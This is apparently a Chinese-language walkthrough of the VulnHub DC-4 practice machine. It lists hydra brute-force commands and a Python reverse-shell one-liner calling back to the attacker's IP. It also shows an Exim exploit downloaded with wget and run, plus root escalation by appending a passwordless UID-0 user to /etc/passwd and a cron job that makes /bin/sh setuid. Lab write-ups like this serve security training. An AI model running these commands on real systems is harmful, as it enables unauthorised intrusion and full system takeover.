DC4
靶机地址:https://www.vulnhub.com/entry/dc-4,313/
攻击者ip:192.168.56.108 桥接(自动) vmare
受害者ip:192.168.56.117 仅主机 vmbox
参考:https://blog.csdn.net/Auuuuuuuu/article/details/100059696
https://blog.csdn.net/liver100day/article/details/117707129
主机发现
扫描端口
burp爆破
fucking显示已经登陆了,密码就是上一个
admin/happy
hydra爆破
hydra -l admin -P '/usr/share/wordlists/rockyou.txt' 192.168.56.117 http-post-form "/login.php:username=USER&password=PASS:S=logout" -F
抓包发现可以命令执行
没有nc,但是有python3
which python3
利用python反弹shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.108",1111));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
优化shell python3 -c 'import pty; pty.spawn("/bin/bash")'
exim4提权
先看看具有SUID权限的命令
find / -user root -perm -4000 -print 2>/dev/null
发现一个exim4,查看查看exim4版本
Exim是一个MTA(Mail Transfer Agent,邮件传输代理)服务器软件,该软件基于GPL协议开发,是一款开源软件。该软件主要运行于类UNIX系统。通常该软件会与Dovecot或Courier等软件搭配使用。Exim同时也是“进出口”(Export-Import)的英文缩写。
exim4 --version
searchsploit exim 4
查看历史版本漏洞
发送到/var/www/html,传给靶机
cp /usr/share/exploitdb/exploits/linux/local/46996.sh /var/www/html
cd /tmp wget http://192.168.56.108/46996.sh chmod 777 46996.sh ./46996
root的flag
提权2
发现3个用户,charles jim sam
cat /home/jim/backups/old-passwords.bak
发现一个密码本
使用hydra爆破
hydra -L use.txt -P pwd.txt -vV ssh://192.168.56.117:22 -f
把刚才的密码塞到pwd.txt,
charles jim sam塞到use.txt
成功爆破出jim/jibril04
ssh连接
登陆过后发现一个邮件,进去发现是charles的密码,charles/^xHhA&hvim0y
登录charles
sudo -l 查看用户权限发现,该用户可以以root权限免密码执行 /usr/bin/teehee
查看teehee发现,它可以在文件末尾追加数据,但是并不会覆盖原来文件
teehee --help
提权2.1
添加一个无密码用户,并使用teehee执行写入 passwd中
echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd 参数解释 #如:admin:x:0:0::/home/admin:/bin/bash #[用户名]:[密码]:[UID]:[GID]:[身份描述]:[主目录]:[登录shell] "-a" 选项的作用等同于 ">>" 命令
提权2.2 通过定时任务执行脚本提权
向/etc/crontab文件中写入新的定时任务时间部分全部填写为*,这样默认这个定时任务每分钟执行一次,可以根据情况自行设定。通过执行的脚本将/bin/sh的权限修改为4777,这样就可以在非root用户下执行它,并且执行期间拥有root权限。
echo "****root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab cat /etc/crontab ls -al /bin/sh ls -al /bin/bash /bin/sh
原文始发于微信公众号(王之暴龙战神):DC4
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论